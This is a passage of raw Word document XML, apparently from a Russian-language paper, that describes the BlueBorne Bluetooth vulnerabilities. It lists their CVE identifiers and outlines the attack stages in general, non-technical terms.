          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общее название восьми опасных уязвимостей электронных устройств, работающих с различными имплементациями </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C24283">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">По словам исследователей безопасности из компании </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Armis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00880DF7" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[31]</w:t>
      </w:r>
      <w:r w:rsidRPr="00880DF7">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> обнаруживших уязвимости, проблемы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> невозможно обнаружить и исправить стандартными методами, а для эксплуатации багов </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">злоумышленнику не требуется ни взаимодействие с пользователем, ни сопряжение с целевым устройством. Единственная необходимость - включенный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> на устройстве «жертвы». Уязвимости затрагивают практически все типы устройств, от смартфонов, ноутбуков и носимых гаджетов до </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-девайсов и «умных» автомобилей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Уязвимости обозначены следующими идентификаторами CVE</w:t>
      </w:r>
      <w:r w:rsidR="008A3966" w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[32-39]</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="008A3966" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Hlk503960914"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-1000251. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r w:rsidR="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008A3966" w:rsidRPr="008A3966">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="008A3966">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008A3966" w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ядре</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3966">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Hlk503960919"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C29">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-1000250. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимость утечки данных в стеке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Hlk503960925"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-0785. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимость утечки данных в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Hlk503960931"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-0781. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Hlk503960936"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-0782. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Hlk503960940"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-0783. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Логическая</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>уязвимость</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android (Bluetooth Pineapple);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Hlk503960953"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-8628. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Логическая</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>уязвимость</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows (Bluetooth Pineapple);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3966" w:rsidRPr="008A3966" w:rsidRDefault="00012BBF" w:rsidP="008A3966">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Hlk503960964"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-14315 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCE-</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>уязвимость</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>проприетарного</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>протокола</w:t>
      </w:r>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apple Low Energy Audio Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC0E96" w:rsidRDefault="00CC0E96" w:rsidP="004014A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Вектор атаки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> может потенциально повлиять на все устройства с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, количество которых сегодня оценивается более чем в 8,2 миллиарда. </w:t>
      </w:r>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Вектор атаки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> состоит из нескольких этапов. Во-первых, злоумышленник обнаруживает активные соединения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> вокруг. Устройства могут быть идентифицированы, даже не находясь в режиме «обнаружения». Затем злоумышленник получает MAC-адреса уязвимых устройств. «Прощупав» устройство, злоумышленник определяет, какую операционную систему использует его жертва, и настраивает соответствующим образом эксплойт. Затем используя уязвимость в реализации протокола </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> на соответствующей платформе, злоумышленник получает доступ, необходимый для достижения его злонамеренной цели. На этом этапе хакер может выбрать атаку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Man-in-The-</w:t>
      </w:r>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">», «прослушивать» устройство или получить полный контроль с целью использования его в широком круге </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
